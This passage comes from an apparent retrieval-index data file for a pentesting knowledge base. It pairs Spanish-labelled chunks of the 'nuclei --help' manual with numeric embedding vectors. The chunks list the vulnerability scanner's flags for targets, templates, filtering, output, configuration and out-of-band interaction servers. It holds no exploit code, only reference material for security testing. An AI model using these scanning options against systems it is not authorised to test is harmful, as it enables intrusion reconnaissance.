0.12172, 0.05357, -0.00714, -0.03629, 0.00447, 0.01608, -0.11979, -0.04433, -0.12, -0.18129, -0.02998, -0.01086, -0.03534, 0.14341, -0.05669, -0.07389, 0.01915, -0.15547, -0.03056, -0.01573, -0.01096, -0.0366, -0.13969, 0.04952, 0.02937, -0.10401, 0.03716, -0.07078, 0.05404, -0.00284, 0.02709, 0.05123, -0.03217, 0.07173, -0.09299, 0.14514, 0.07569, 0.02205, -0.02355, -0.11153, -0.06448, -0.09042, -0.04257, 0.05213, -0.09199, 0.04163, -0.00969, 0.08208, 0.02827, 0.02642, -0.01489, 0.03019, -0.11019, -0.07469, -0.00153, -0.03445, -0.09276, -0.01784, 0.05984, -0.09076, 0.14648, 0.01571, -0.0029, 0.05797, 0.01183, 0.03498, 0.01247, 0.03633, 0.0202, -0.04516, -0.03771, -0.03795, -0.0296, 0.0005, -0.06135, 0.00392, -0.03025, -0.07246, -0.06838, 0.01132, 0.01162, -0.02348, 0.037, -0.01482, 0.0627, -0.05104, -0.0586, 0.00832, -0.01477, -0.00525, 0.03047, -0.00037, 0.09567, 0.04683, -0.06056, -0.03951, 0.00261, 0.00377, 0.00712, 0.017, 0.05055, 0.05399, 0.00455, 0.02328, -0.03606, -0.09916, 0.01169, 0.00574, 0.02981, -0.02569, -0.02669, -0.03509, -0.00073, -0.03585, -0.02293, -0.07225, 0.04564, 0.00408, 0.03359, -0.01199, 0.06905, 0.00394, -0.02886, 0.02075, -0.03069, 0.07495, 0.00748, 0.03581, 0.02968, 0.00149, -0.05539, 0.0132, -0.05124, 0.03815, -0.0216, 0.02046, -0.04623, 0.04733, -0.04734, 0.07744, 0.05025, 0.02667, 0.0084, 0.03815, -0.03444, 0.02988, 0.00017, 0.01473, 0.06463, -0.08822, 0.02185, 0.01418, -0.011, -0.03287, -0.03075, -0.00499, -0.02667, -0.03308, 0.01477, -0.02356, -0.04434, 0.0581, 0.02032, -0.05616, -0.01587, -0.03122, -0.02774, -0.00235, -0.03366, 0.00212, -0.04455, -0.0836, -0.04319, -0.00609, 0.03522, -0.01935, -0.03766, -0.04423, 0.05135, 0.05989, 0.00689, 0.03864, -0.01439, 0.02833, -0.00286, 0.02509, -0.00606, -0.02621, 0.04129, -0.02652, -0.01182, 0.06016, -0.0354, -0.02852, 0.02409, -0.01675, -0.0223, 0.01041, 0.00405, -0.01142, 0.00061, -0.0217, -0.03131, -0.09131, 0.00696, 0.00153, 0.03143, -0.02397, -0.05062, -0.01857, -0.04313, -0.02906, -0.03142]} +{"tipo": "metodologia", "herramienta": "nuclei", "perfil": "PENTESTERS", "tema": "manuales", "fichero": "conocimiento/09 - Manuales/nuclei.md", "texto": "# nuclei — manual\n\nSalida de `nuclei --help`, capturada de la propia herramienta. Referencia completa de opciones (las invocaciones del dia a dia estan en el cheatsheet de comandos).\n\n```\nNuclei is a fast, template based vulnerability scanner focusing\non extensive configurability, massive extensibility and ease of use.\n\nUsage:\n nuclei [flags]\n\nFlags:\nTARGET:\n -u, -target string[] target URLs/hosts to scan\n -l, -list string path to file containing a list of target URLs/hosts to scan (one per line)\n -eh, -exclude-hosts string[] hosts to exclude to scan from the input list (ip, cidr, hostname)\n -resume string resume scan using resume.cfg (clustering will be disabled)\n -sa, -scan-all-ips scan all the IP's associated with dns record\n -iv, -ip-version string[] IP version to scan of hostname (4,6) - (default 4)", "v": [0.16784, -0.08424, -0.20661, -0.20672, 0.10504, -0.24823, -0.11242, -0.10448, 0.01424, 0.07252, -0.08951, -0.15267, -0.06808, -0.10929, -0.01104, 0.07775, -0.01957, -0.05341, -0.01065, -0.01324, -0.05565, 0.01021, -0.09559, -0.00141, -0.07154, 0.04969, -0.10038, 0.07614, -0.13629, -0.07348, -0.03627, -0.0838, -0.01946, -0.04384, -0.10575, -0.10447, -0.03938, 0.08072, -0.00884, 0.14191, -0.04815, 0.05152, -0.18748, 0.01335, -0.0026, -0.07647, -0.00732, 0.06066, 0.08302, -0.04751, -0.08257, -0.07664, -0.12075, -0.03103, -0.05042, -0.05692, 0.0944, -0.04827, 0.00941, -0.01477, -0.06524, 0.02785, -0.02536, -0.0377, 0.04561, 0.01228, -0.03665, -0.01644, -0.19202, -0.04975, -0.03443, 0.00075, -0.01079, -0.01791, 0.07233, -0.01148, 0.01876, -0.10732, 0.07946, 0.02834, -0.00179, -0.09892, -0.11171, -0.066, -0.07802, -0.0131, -0.02523, -0.02214, -0.03459, -0.00711, 0.10606, -0.02239, 0.01838, 0.02863, 0.05562, -0.04673, 0.05502, 0.05324, 0.0398, -0.0451, 0.02086, 0.01154, -0.10628, 0.2047, 0.10419, 0.04032, -0.00357, -0.00242, -0.0143, 0.01026, 0.04049, 0.00699, -0.08741, -0.04009, -0.04746, -0.03932, -0.03715, 0.00212, 0.00606, -0.05451, -0.05956, -0.06506, 0.00768, 0.05223, 0.00797, 0.02557, -0.05589, 0.0862, 0.05056, -0.05572, -0.02796, 0.03996, -0.06317, -0.03368, -0.07972, 0.06014, 0.00717, -0.09355, -0.00167, 0.01794, 0.02188, 0.02154, -0.03693, 0.03773, 0.12506, -0.04175, 0.00183, -0.06306, -0.02484, 0.05465, 0.0234, 0.04827, 0.02605, 0.02642, -0.07213, -0.075, 0.04252, -0.04463, -0.01526, 0.03576, 0.00832, -0.03387, 0.02352, 0.0222, 0.00928, 0.04808, -0.0142, -0.05012, 0.06445, -0.02337, -0.03414, 0.04738, -0.04492, -0.05499, -0.04506, -0.05804, 0.05629, 0.00586, -0.00132, -0.07586, -0.01377, -0.00595, 0.03422, -0.00289, 0.02794, -0.02476, 0.03651, -0.0254, 0.00573, -0.02319, 0.05696, 0.04274, -0.07266, 0.05917, 0.00459, 0.00283, -0.05982, -0.04527, 0.01526, -0.05161, -0.06943, -0.011, 0.04155, -0.05397, 0.01637, 0.05218, -0.0256, 0.03244, -0.03633, 0.00458, 0.02454, -0.03799, 0.07417, 0.00051, -0.12222, -0.01639, 0.02851, 0.02511, -0.00115, -0.0243, 0.01305, 0.07667, 0.05203, -2e-05, -0.00268, 0.01095, 0.07074, -0.00531, 0.08578, -0.02942, -0.01072, 0.07107, -0.02413, -0.04854, 0.03355, -0.00506, -0.00123, 0.01364, -0.03651, -0.05381, 0.0435, 0.03955, -0.02339, -0.0477, -0.01956, -0.03455, -0.05916, 0.03467, 0.03475, -0.02242, -0.05535, -0.02475, 0.06067, -0.06269, 0.0041, -0.04641]} +{"tipo": "metodologia", "herramienta": "nuclei", "perfil": "PENTESTERS", "tema": "manuales", "fichero": "conocimiento/09 - Manuales/nuclei.md", "texto": "TARGET-FORMAT:\n -im, -input-mode string mode of input file (list, burp, jsonl, yaml, openapi, swagger) (default \"list\")\n -ro, -required-only use only required fields in input format when generating requests\n -sfv, -skip-format-validation skip format validation (like missing vars) when parsing input file", "v": [0.10607, 0.04885, -0.19305, -0.1873, -0.01408, -0.21745, -0.09495, -0.0588, 0.04211, -0.04641, -0.14763, -0.21313, 0.07797, -0.1129, 0.07431, 0.07816, -0.0345, -0.14395, -0.07634, 0.09346, 0.02604, 0.04443, -0.03796, -0.17494, -0.02452, 0.09865, -0.06702, 0.0424, -0.18034, 0.05703, 0.06478, -0.06208, 0.04245, -0.03322, -0.07711, 0.00879, 0.04236, 0.05721, -0.10106, 0.20933, -0.04411, 0.1348, -0.09946, 0.09796, 0.02057, -0.09172, 0.07382, 0.12709, 0.0205, -0.01764, -0.0023, -0.02439, -0.09253, 0.03288, -0.03836, -0.03507, 0.1015, -0.19042, -0.05708, 0.03214, -0.11642, 0.04449, -0.03373, -0.07269, 0.07929, 0.00872, 0.15778, -0.03981, -0.06654, 0.04558, -0.02144, -0.04746, -0.01329, -0.05378, 0.09411, -0.04268, -0.02512, -0.10228, 0.02873, 0.07119, -0.03963, -0.03908, -0.07207, -0.01649, 0.05236, -0.06914, 0.02583, 0.00425, -0.08341, -0.01616, 0.09418, -0.0223, 0.07231, -0.03326, -0.00504, -0.14049, -0.03458, 0.00398, 0.0068, -0.00286, -0.05587, -0.00385, -0.08639, 0.08882, 0.05923, -0.05659, 0.02556, -0.02899, 0.03179, -0.01852, 0.07907, 0.05712, 0.02267, -0.05918, 0.01136, -0.05662, -0.00614, -0.04615, 0.00291, -0.03177, -0.03343, -0.05013, -0.02178, 0.0229, 0.02277, -0.03482, -0.00987, 0.00526, 0.03838, 0.02774, 0.04527, 0.02181, -0.06727, -0.04039, 0.02943, -0.03345, 0.05701, 0.07502, -0.01347, 0.01267, -0.0073, 0.01131, -0.0371, 0.02624, 0.0199, -0.03379, 0.04098, -0.08157, -0.08445, -0.03176, 2e-05, 0.02381, 0.00603, 0.00982, -0.02492, -0.05702, 0.06827, -0.05609, -0.0167, -0.01407, 0.01578, 0.06182, -0.00676, 0.06075, 0.01122, -0.03563, 0.04634, -0.07948, 0.02218, -0.09594, 0.02424, -0.00508, -0.02603, -0.0908, -0.03051, 0.0202, -0.02586, -0.04351, 0.01817, -0.0369, 0.05014, 0.02452, 0.01919, 0.04299, 0.02197, -0.05895, -0.06221, -0.07878, 0.0185, -0.03079, -0.0081, 0.06575, -0.03155, -0.01322, 0.02738, 0.03397, -0.02073, 0.05073, 0.04405, -0.03003, -0.04101, -0.01518, -0.00637, -0.08478, 0.03801, 0.02152, -0.07769, 0.02909, -0.00742, -0.0242, 0.02024, -0.06568, 0.03864, 0.01788, -0.02095, 0.00224, -0.01103, 0.03993, 0.033, -0.01949, -0.04374, 0.02539, 0.05904, 0.02334, 0.03441, -0.01034, 0.05272, -0.00461, -0.01734, 0.01225, 0.00226, 0.017, -0.04287, -0.01398, 0.01665, -0.0091, -0.02812, -0.00936, -0.05938, -0.01487, 0.07135, 0.0385, -0.02173, 0.00727, -0.00907, -0.01223, -0.07845, 0.01691, -0.00044, -0.04585, -0.01927, -0.00994, -0.00639, -0.06939, -0.00413, -0.08995]} +{"tipo": "metodologia", "herramienta": "nuclei", "perfil": "PENTESTERS", "tema": "manuales", "fichero": "conocimiento/09 - Manuales/nuclei.md", "texto": "TEMPLATES:\n -nt, -new-templates run only new templates added in latest nuclei-templates release\n -ntv, -new-templates-version string[] run new templates added in specific version\n -as, -automatic-scan automatic web scan using wappalyzer technology detection to tags mapping\n -t, -templates string[] list of template or template directory to run (comma-separated, file)\n -turl, -template-url string[] template url or list containing template urls to run (comma-separated, file)\n -ai, -prompt string generate and run template using ai prompt\n -w, -workflows string[] list of workflow or workflow directory to run (comma-separated, file)\n -wurl, -workflow-url string[] workflow url or list containing workflow urls to run (comma-separated, file)\n -validate validate the passed templates to nuclei\n -nss, -no-strict-syntax disable strict syntax check on templates\n -td, -template-display displays the templates content\n -tl list all available templates\n -tgl list all available tags\n -sign signs the templates with the private key defined in NUCLEI_SIGNATURE_PRIVATE_KEY env variable\n -code enable loading code protocol-based templates\n -dut, -disable-unsigned-templates disable running unsigned templates or templates with mismatched signature\n -esc, -enable-self-contained enable loading self-contained templates\n -egm, -enable-global-matchers enable loading global matchers templates\n -file enable loading file templates", "v": [0.19128, -0.03772, -0.18972, -0.30519, 0.10108, -0.17028, -0.1437, -0.00725, 0.10951, 0.11541, -0.15745, -0.13445, 0.07987, -0.06271, -0.00752, -0.03086, -0.05032, -0.17426, 0.09557, -0.03775, -0.05064, -0.06471, -0.17832, -0.12081, -0.01192, 0.0117, -0.08976, 0.02272, -0.10044, -0.04557, -0.01444, 0.00536, 0.01791, -0.07536, -0.08441, 0.03775, -0.02586, 0.05526, -0.14285, 0.13521, -0.0711, 0.00687, -0.16049, 0.12877, -0.07089, -0.06036, 0.04848, 0.06126, 0.06713, -0.04767, -0.09645, -0.00745, -0.10851, -0.01655, 0.00593, -0.06306, 0.22396, -0.01803, -0.04698, 0.01663, -0.03099, -0.00113, -0.02379, -0.08968, -0.00779, 0.04809, 0.09635, -0.00884, -0.05496, 0.00354, -0.03867, -0.03303, 0.05122, -0.10575, 0.06142, -0.01454, 0.00452, -0.12786, 0.01829, 0.12499, 0.00368, -0.13469, -0.0336, 0.00072, -0.01281, 0.00919, 0.00488, 0.01659, 0.01115, -0.03206, 0.08903, -0.0388, 0.0015, 0.0152, -0.04362, -0.00815, -0.0567, -0.02281, 0.04843, -0.01007, -0.05837, -0.04597, -0.06773, 0.11158, 0.08304, -0.03734, 0.03256, 0.00593, 0.02727, -0.00085, 0.06262, -0.04259, -0.00682, -0.07461, -0.01981, 0.01997, -0.02896, 0.0539, -0.00782, -0.0316, -0.03817, -0.07745, -0.08878, 0.04812, -0.0019, -0.01324, -0.0046, 0.0921, -0.04133, 0.02306, -0.02522, -0.00479, -0.08468, -0.00046, -0.09098, 0.06393, 0.08438, 0.03786, -0.01396, -0.02617, -0.05866, 0.04802, 0.00811, 0.11356, 0.03887, -0.01893, -0.0073, -0.03275, -0.07077, 0.02356, 0.00461, 0.00262, 0.01951, -0.06582, -0.07889, -0.09441, 0.06103, -0.02106, -0.01167, -0.02195, -0.01288, 0.01543, -0.02513, 0.01433, 0.00037, 0.07193, 0.01948, -0.03779, 0.02636, -0.02566, 0.01152, 0.02933, 0.01338, -0.06321, -0.02759, -0.03244, 0.04854, -0.02738, 0.04407, -0.02704, 0.02408, -0.0006, 0.06309, 0.04544, 0.00154, -0.04536, -0.00365, 0.01908, -0.00385, -0.01502, -0.02634, 0.05301, -0.01403, -0.00571, 0.02718, 0.01284, -0.02989, 0.00644, 0.00323, -0.02017, -0.04421, -0.03753, 0.04068, -0.06359, 0.04395, 0.06156, -0.02028, 0.02125, -0.00054, -0.00714, 0.05889, -0.03219, -0.00978, 0.01234, -0.06337, -0.01665, -0.03214, 0.00412, 0.05078, -0.0497, -0.01468, 0.02549, 0.01391, -0.05452, 0.03305, 0.04526, -0.00205, 0.01701, 0.01339, -0.03907, 0.00881, 0.02366, -0.01714, -0.00673, 0.01186, -0.02053, -0.03905, 0.0226, -0.02114, -0.04644, 0.03374, 0.02633, -0.02476, 0.01046, -0.04381, -0.02334, -0.01904, -0.03072, 0.00635, -0.0216, -0.00631, -0.05806, -0.00108, -0.03282, 0.01353, -0.01803]} +{"tipo": "metodologia", "herramienta": "nuclei", "perfil": "PENTESTERS", "tema": "manuales", "fichero": "conocimiento/09 - Manuales/nuclei.md", "texto": "FILTERING:\n -a, -author string[] templates to run based on authors (comma-separated, file)\n -tags string[] templates to run based on tags (comma-separated, file)\n -etags, -exclude-tags string[] templates to exclude based on tags (comma-separated, file)\n -itags, -include-tags string[] tags to be executed even if they are excluded either by default or configuration\n -id, -template-id string[] templates to run based on template ids (comma-separated, file, allow-wildcard)\n -eid, -exclude-id string[] templates to exclude based on template ids (comma-separated, file)\n -it, -include-templates string[] path to template file or directory to be executed even if they are excluded either by default or configuration\n -et, -exclude-templates string[] path to template file or directory to exclude (comma-separated, file)\n -em, -exclude-matchers string[] template matchers to exclude in result\n -s, -severity value[] templates to run based on severity. Possible values: info, low, medium, high, critical, unknown\n -es, -exclude-severity value[] templates to exclude based on severity. Possible values: info, low, medium, high, critical, unknown\n -pt, -type value[] templates to run based on protocol type. Possible values: dns, file, http, headless, tcp, workflow, ssl, websocket, whois, code, javascript\n -ept, -exclude-type value[] templates to exclude based on protocol type. Possible values: dns, file, http, headless, tcp, workflow, ssl, websocket, whois, code, javascript\n -tc, -template-condition string[] templates to run based on expression condition", "v": [0.17704, -0.05846, -0.14512, -0.16177, 0.05876, -0.1462, -0.04718, -0.02086, 0.10729, 0.14714, -0.08559, -0.10738, 0.02213, -0.09617, 0.04357, -0.04415, 0.00688, -0.11154, 0.09328, -0.07403, -0.03705, -0.10268, -0.1398, -0.04341, -0.05677, 0.05437, -0.10407, 0.07778, -0.13221, -0.03041, -0.01534, -0.05935, 0.01304, -0.08576, -0.1248, 0.08317, -0.06408, 0.12669, -0.18587, 0.14794, 0.00249, 0.00814, -0.13559, 0.10783, -0.01432, -0.13923, -0.02718, 0.05533, 0.07517, -0.08316, -0.0848, -0.04409, -0.12961, -0.01524, 0.01114, -0.00112, 0.172, -0.0777, -0.05471, 0.06858, -0.05627, 0.06543, -0.03434, -0.10463, -0.00112, 0.03487, 0.10245, -0.01228, -0.01547, 0.0207, 0.00632, -0.08667, -0.03379, -0.07375, 0.14177, -0.00636, 0.07148, -0.10319, 0.06832, 0.04722, 0.0417, -0.09845, -0.0634, -0.02846, -0.01079, -0.01229, 0.02421, -0.02061, 0.00225, -0.05306, 0.13111, 0.01078, -0.01698, -0.03528, -0.09124, -0.08236, -0.07758, -0.00897, 0.06932, -0.03932, -0.05971, -0.02143, -0.0668, 0.11781, 0.1328, -0.0169, 0.02431, 0.01743, 0.01471, -0.02844, 0.06318, -0.02908, -0.00753, -0.05712, -0.06704, -0.01842, 0.00673, 0.02666, 0.0392, 0.01694, -0.06694, -0.06791, -0.08087, 0.04753, 0.00946, -0.01142, -0.0286, 0.0806, -0.04919, 0.01311, -0.02361, 0.02073, -0.11608, -0.01732, -0.05254, 0.10097, 0.13149, 0.02289, -0.05174, -0.02852, -0.03781, 0.02818, -0.04262, 0.06902, 0.06434, 0.01373, -0.03379, -0.02446, -0.04061, 0.0326, 0.00687, 0.05344, -0.02075, -0.05514, -0.12107, -0.0676, 0.06067, -0.04747, 0.00729, -0.02734, 0.00395, 0.05026, 0.00121, -0.01416, 0.06583, 0.08182, 0.02315, -0.0461, 0.06429, -0.06163, -0.00557, 0.04634, 0.01517, -0.03118, -0.06394, -0.06216, 0.00916, -0.0809, 0.02556, -0.02865, 0.03526, -0.01997, 0.03827, 0.03351, 0.01478, -0.00781, 0.02483, -0.0362, -0.01273, -0.03329, -0.03864, -9e-05, -0.06743, 0.01521, -0.00274, 0.00302, -0.02992, -0.03215, 0.02324, -0.01114, -0.0768, -0.0301, 0.04212, -0.06219, 0.02115, 0.00144, -0.0048, -0.00176, 0.00576, -0.00359, 0.02547, -0.04036, -0.02715, -0.00148, -0.06704, 0.0263, -0.03652, 0.01817, 0.03686, -0.00555, -0.07106, 0.03119, 0.0145, -0.03411, 0.07666, 0.01087, 0.02983, -0.0105, 0.00476, -0.0482, -0.02398, 0.00718, -0.01537, -0.02235, 0.03038, -0.01426, -0.03382, -0.01033, -0.05723, -0.03431, 0.04583, 0.02935, -0.03367, -0.00572, -0.0449, -0.03637, -0.06861, -0.02221, -0.0019, -0.01896, -0.05841, -0.06776, 0.00895, -0.0598, -0.00862, -0.05097]} +{"tipo": "metodologia", "herramienta": "nuclei", "perfil": "PENTESTERS", "tema": "manuales", "fichero": "conocimiento/09 - Manuales/nuclei.md", "texto": "OUTPUT:\n -o, -output string output file to write found issues/vulnerabilities\n -sresp, -store-resp store all request/response passed through nuclei to output directory\n -srd, -store-resp-dir string store all request/response passed through nuclei to custom directory (default \"output\")\n -silent display findings only\n -nc, -no-color disable output content coloring (ANSI escape codes)\n -j, -jsonl write output in JSONL(ines) format\n -irr, -include-rr -omit-raw include request/response pairs in the JSON, JSONL, and Markdown outputs (for findings only) [DEPRECATED use -omit-raw] (default true)\n -or, -omit-raw omit request/response pairs in the JSON, JSONL, and Markdown outputs (for findings only)\n -ot, -omit-template omit encoded template in the JSON, JSONL output\n -nm, -no-meta disable printing result metadata in cli output\n -ts, -timestamp enables printing timestamp in cli output\n -rdb, -report-db string nuclei reporting database (always use this to persist report data)\n -ms, -matcher-status display match failure status\n -me, -markdown-export string directory to export results in markdown format\n -se, -sarif-export string file to export results in SARIF format\n -je, -json-export string file to export results in JSON format\n -jle, -jsonl-export string file to export results in JSONL(ine) format\n -rd, -redact string[] redact given list of keys from query parameter, request header and body", "v": [0.08385, -0.10489, -0.14026, -0.30094, 0.02814, -0.16182, -0.15413, 0.00961, -0.00429, 0.08775, -0.18978, -0.1996, 0.05816, -0.09067, 0.05004, -0.10194, -0.01618, -0.01706, -0.04611, -0.00611, -0.07141, -0.0631, -0.03934, -0.12734, 0.07149, 0.20297, -0.08966, 0.07999, -0.13247, 0.05338, 0.02351, -0.06289, 0.03763, -0.0511, -0.07477, 0.01993, 0.03675, 0.08627, -0.09367, 0.24239, 0.01128, -0.0645, -0.0541, 0.02663, -0.01499, -0.00528, 0.07037, 0.10428, 0.00107, -0.05165, -0.03986, -0.00816, -0.11123, 0.09431, -0.00569, -0.05679, -0.01495, -0.00045, -0.00361, -0.03262, -0.07411, -0.00826, -0.02659, -0.20317, 0.09794, -0.02656, 0.05836, -0.10719, 0.00046, 0.00808, -0.05799, -0.02616, -0.01154, -0.08784, 0.03006, -0.08115, -0.07661, -0.05619, 0.02975, 0.07763, -0.08766, -0.06525, 0.01811, -0.00116, 0.04214, -0.00029, 0.03186, -0.04298, -0.07972, -0.05006, 0.05575, -0.09028, -0.03432, -0.00562, 0.0287, -0.08516, -0.03562, -0.05233, -0.02541, -0.05806, -0.07725, 0.05544, -0.02951, 0.09441, 0.11628, -0.01049, 0.05471, 0.00317, -0.01251, 0.11872, 0.09552, 0.00673, -0.00429, -0.05382, -0.02833, -0.04325, -0.04182, -0.02431, -0.04979, 0.043, -0.00751, -0.05571, -8e-05, -0.00769, -0.02632, -0.00555, -0.01579, -0.00217, -0.001, 0.00852, 0.01324, 0.05783, -0.04224, -0.00647, -0.03237, 0.1156, 0.09529, -0.02066, -0.00096, -0.07494, -0.01996, -0.05325, -0.02363, 0.06646, 0.05944, -0.01921, -0.00072, 0.02619, -0.03429, 0.01024, 0.0566, -0.02038, -0.00151, -0.09625, -0.02354, -0.10041, 0.0517, 0.04872, -0.00064, -0.04524, -0.03804, 0.07581, -0.00976, 0.03719, 0.03363, 0.03373, 0.03336, -0.025, 0.07669, -0.04028, -0.04369, -0.00311, -0.01867, -0.10359, -0.01338, -0.00174, -0.00558, -0.02017, 0.00319, -0.02785, 0.07638, 0.00521, 0.01251, -0.00328, 0.02271, -0.05179, 0.04235, -0.02817, -0.03205, -0.06875, 0.02567, 0.11789, 0.03432, -0.04502, -0.00241, 0.0164, -0.01333, 0.00916, 0.01326, -0.02842, -0.02391, -0.00634, 0.0933, -0.04975, 0.00982, 0.01586, -0.06023, -0.00018, -0.01517, -0.03703, 0.01856, 0.00431, 0.00925, 0.01155, -0.0705, 0.01164, -0.07009, 0.02783, 0.04835, -0.0232, -0.01186, 0.03205, 0.04468, -0.00822, 0.08043, 0.03552, 0.01265, 0.00162, 0.0049, -0.00551, -0.02656, 0.03557, -0.06207, 0.00944, 0.00356, -0.06463, -0.05308, 0.0147, 0.0038, -0.02904, 0.02203, -0.0325, 0.01144, 0.01064, -0.01263, 0.02445, -0.03016, 0.01652, 0.05653, -0.05377, -0.01345, -0.00271, 0.01516, -0.00713, 0.03312, -0.00878]} +{"tipo": "metodologia", "herramienta": "nuclei", "perfil": "PENTESTERS", "tema": "manuales", "fichero": "conocimiento/09 - Manuales/nuclei.md", "texto": "CONFIGURATIONS:\n -config string path to the nuclei configuration file\n -tp, -profile string template profile config file to run\n -tpl, -profile-list list community template profiles\n -fr, -follow-redirects enable following redirects for http templates\n -fhr, -follow-host-redirects follow redirects on the same host\n -mr, -max-redirects int max number of redirects to follow for http templates (default 10)\n -dr, -disable-redirects disable redirects for http templates\n -rc, -report-config string nuclei reporting module configuration file\n -H, -header string[] custom header/cookie to include in all http request in header:value format (cli, file)\n -V, -var value custom vars in key=value format\n -r, -resolvers string file containing resolver list for nuclei\n -sr, -system-resolvers use system DNS resolving as error fallback\n -dc, -disable-clustering disable clustering of requests\n -passive enable passive HTTP response processing mode\n -fh2, -force-http2 force http2 connection on requests\n -ev, -env-vars enable environment variables to be used in template\n -cc, -client-cert string client certificate file (PEM-encoded) used for authenticating against scanned hosts\n -ck, -client-key string client key file (PEM-encoded) used for authenticating against scanned hosts\n -ca, -client-ca string client certificate authority file (PEM-encoded) used for authenticating against scanned hosts\n -sml, -show-match-line show match lines for file templates, works with extractors only\n -ztls use ztls library with autofallback to standard one for tls13 [Deprecated] autofallback to ztls is enabled by default\n -sni string tls sni hostname to use (default: input domain name)\n -dka, -dialer-keep-alive value keep-alive duration for network requests.\n -lfa, -allow-local-file-access allows file (payload) access anywhere on the system\n -lna, -restrict-local-network-access blocks connections to the local / private network\n -i, -interface string network interface to use for network scan\n -at, -attack-type string type of payload combinations to perform (batteringram,pitchfork,clusterbomb)\n -sip, -source-ip string source ip address to use for network scan\n -rsr, -response-size-read int max response size to read in bytes\n -rss, -response-size-save int max response size to read in bytes (default 1048576)\n -reset reset removes all nuclei configuration and data files (including nuclei-templates)\n -tlsi, -tls-impersonate enable experimental client hello (ja3) tls randomization\n -hae, -http-api-endpoint string experimental http api endpoint", "v": [0.24673, -0.01956, -0.19614, -0.29099, 0.07064, -0.19968, -0.10168, -0.00824, 0.04289, 0.04519, -0.14877, -0.17964, -0.03924, -0.10126, 0.07031, -0.05464, -0.02458, -0.11103, 0.05881, -0.04137, -0.0682, -0.03883, -0.10439, -0.04084, -0.00014, 0.06884, -0.04636, 0.04427, -0.1605, -0.04603, 0.02488, -0.09045, -0.01376, 0.00613, -0.0728, 0.04434, -0.0148, 0.06819, -0.04463, 0.13874, -0.02965, 0.01597, -0.14877, 0.11454, -0.01985, -0.08023, -0.02086, -0.01713, 0.08425, -0.09011, -0.10185, -0.04966, -0.21275, 0.00393, 0.00105, -0.05298, 0.10853, -0.11369, 0.01498, -0.02761, -0.07786, 0.00838, -0.0416, -0.04142, 0.0411, -0.01667, 0.09022, 0.01542, -0.12098, -0.02214, -0.05288, -0.02735, 0.06199, -0.05267, 0.09488, 0.01798, 0.04075, -0.08606, 0.10721, 0.08339, -0.03882, -0.04267, -0.09984, -0.02156, -0.04847, 0.0336, 0.00767, -0.06333, 0.01041, -0.05471, 0.09527, -0.01139, -0.03106, 0.0189, 0.02152, -0.11112, -0.01324, 0.00146, 0.0433, -0.05366, -0.01347, 0.01537, -0.07971, 0.14717, 0.12369, -0.02289, 0.06314, -0.05294, 0.01729, -0.0023, 0.07001, -0.02144, 0.00129, -0.0155, -0.00187, -0.05971, -0.01973, 0.01927, 0.0173, -0.02018, -0.07757, -0.11951, -0.03318, 0.01172, -0.03273, 0.03806, -0.01029, 0.07408, -0.01637, 0.00357, -0.02659, 0.01839, -0.06233, -0.05496, -0.07008, 0.0327, 0.11879, -0.04761, -0.00623, -0.02532, 0.02904, 0.06618, 0.00471, 0.08027, 0.10634, 0.006, -0.01337, -0.07467, -0.05296, 0.00997, 0.02529, 0.07019, -0.01797, -0.05594, -0.09741, -0.04633, 0.00941, -0.03981, -0.00439, 0.01673, 0.0091, 0.01838, 0.02371, 0.03223, -0.01178, 0.02338, -0.03419, -0.01806, 0.08971, -0.02535, -0.03224, 0.04306, -0.01641, -0.08469, -0.04574, -0.02854, 0.0212, -0.03413, 0.03106, -0.02705, 0.01883, -0.01388, 0.05381, 0.06065, 0.05288, -0.02262, -0.01434, 0.02015, -0.01116, -0.03372, -0.00311, 0.0671, -0.03925, 0.02855, 0.01903, -0.00137, -0.05814, -0.02244, 0.02275, -0.02421, -0.0216, -0.00885, 0.03653, -0.04139, 0.00153, 0.02866, -0.02635, -0.00303, 0.01109, 0.01469, 0.04476, -0.05739, 0.06063, 0.02234, -0.09324, -0.0264, -0.02399, 0.02657, 0.00176, -0.00023, -0.01007, 0.05126, 0.03239, -0.00748, 0.02976, 0.00365, 0.05455, -0.00197, 0.02, -0.02919, -0.00722, 0.02341, -0.03495, 0.00121, 0.02235, -0.03653, -0.04083, 0.01004, -0.02558, -0.01574, 0.01844, 0.02211, -0.00253, -0.00798, -0.00221, -0.0209, -0.0699, 0.00171, 0.04369, -0.02812, -0.03424, -0.02726, -0.00388, -0.04414, -0.00416, -0.03064]} +{"tipo": "metodologia", "herramienta": "nuclei", "perfil": "PENTESTERS", "tema": "manuales", "fichero": "conocimiento/09 - Manuales/nuclei.md", "texto": "INTERACTSH:\n -iserver, -interactsh-server string interactsh server url for self-hosted instance (default: oast.pro,oast.live,oast.site,oast.online,oast.fun,oast.me)\n -itoken, -interactsh-token string authentication token for self-hosted interactsh server\n -interactions-cache-size int number of requests to keep in the interactions cache (default 5000)\n -interactions-eviction int number of seconds to wait before evicting requests from cache (default 60)\n -interactions-poll-duration int number of seconds to wait before each interaction poll request (default 5)\n -interactions-cooldown-period int extra time for interaction polling before exiting (default 5)\n -ni, -no-interactsh disable interactsh server for OAST testing, exclude OAST based templates", "v": [0.21181, 0.13948, -0.18889, -0.24848, -0.02238, -0.13692, -0.13339, 0.01569, 0.09275, 0.0946, -0.12133, -0.11529, -0.08117, 0.07385, 0.02894, -0.03315, 0.0627, 0.07187, 0.01308, 0.0112, -0.08102, 0.01435, -0.05069, -0.01378, 0.01478, 0.10891, -0.11979, 0.06696, -0.09866, 0.02101, -0.03011, -0.15831, 0.01541, 0.04561, -0.01692, -0.07928, -0.07253, 0.01742, 0.00674, 0.09107, -0.06337, 0.01893, -0.03472, 0.029, 0.07941, -0.02502, -0.07926, 0.09931, 0.02796, -0.04706, -0.13774, 0.01204, -0.09931, 0.06029, 0.01311, 0.0177, 0.08345, -0.11801, 0.02179, -0.01118, -0.11181, 0.02126, -0.00844, -0.0635, 0.12311, -0.01315, 0.03249, 0.04865, -0.02656, 0.10107, -0.02408, -0.03112, -0.07627, -0.03433, 0.08989, 0.11112, 0.06889, -0.07504, 0.01274, 0.01847, -0.09358, 0.02659, 0.05348, 0.0756, 0.02547, 0.01816, 0.00019, -0.11142, -0.03135, 0.09434, 0.03213, 0.01136, -0.00595, -0.05489, 0.01856, -0.15117, -0.04155, 0.00041, 0.00651, -0.07856, -0.02229, 0.06975, -0.12538, 0.06942, 0.03609, -0.04361, 0.05271, -0.05853, 0.01098, -0.04055, 0.0696, 0.01798, -0.03578, -0.10503, 0.06599, 0.03036, -0.07783, 0.01503, 0.03565, -0.04805, -0.10396, 0.03581, -0.01543, 0.03213, -0.00378, 0.03378, 0.03469, 0.03859, 0.055, 